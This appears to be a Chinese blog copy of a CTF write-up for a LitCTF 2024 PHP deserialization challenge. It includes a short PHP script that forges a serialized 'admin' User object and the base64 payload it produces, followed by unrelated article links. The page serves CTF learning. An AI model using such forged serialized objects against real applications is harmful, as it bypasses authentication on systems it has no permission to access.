当前位置: 首页 > news >正文

[LitCTF 2024]SAS - Serializing Authentication

news 来源:原创 2025/6/2 11:56:15

打开题目在线环境:
在这里插入图片描述
题目给的源码提示我们反序列化,但是重点在输入框里面的那一句**user = unserialize(base64_decode( d a t a ) ) ; ∗ ∗ 将一个 B a s e 64 编码的字符串 data));** 将一个Base64编码的字符串 data));将一个Base64编码的字符串data解码并反序列化,直接写脚本:

<?phpclass User{public $username;public $password;
}
$a=new User();
$a->username="admin";
$a->password="secure_password";
echo base64_encode(serialize($a));?>

运行出来:** Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjg6InBhc3N3b3JkIjtzOjE1OiJzZWN1cmVfcGFzc3dvcmQiO30=**
就能得到:
在这里插入图片描述

相关文章:

  • 智慧物流园区整体解决方案
  • Java 中 Lock 接口详解:灵活强大的线程同步机制
  • AI笔记 - 网络模型 - mobileNet
  • 【沉浸式求职学习day51】【发送邮件】【javaweb结尾】
  • Python 爱心图案代码
  • [SC]SystemC在CPU/GPU验证中的应用(五)
  • 【项目】在线OJ(负载均衡式)
  • 微服务中引入公共拦截器
  • GB 36246-2018 中小学合成材料面层运动场地检测
  • C++ 观察者模式:设计与实现详解
  • 建造者模式:优雅构建复杂对象
  • 飞腾D2000与FPGA结合的主板
  • FPGA纯verilog实现MIPI-DSI视频编码输出,提供工程源码和技术支持
  • proteus美观与偏好设置
  • 鲲鹏Arm+麒麟V10 K8s 离线部署教程
  • git下载和安装(完整版)
  • 【Docker项目实战篇】Docker部署PDF查看器PdfDing
  • 【Dv3Admin】工具权限配置文件解析
  • 机器学习:欠拟合、过拟合、正则化
  • Qt -使用OpenCV得到SDF
  • 网站建设运营公司/武汉seo排名
  • 网站做接口到app价格/一键优化免费下载
  • 做网站客户要求多很烦/软文推广一般发布在哪些平台
  • 网站打开慢的解决方法/武汉网站seo德升
  • 微网站模板建设/最新搜索引擎排名
  • 庐山网站建设/深圳网络推广引流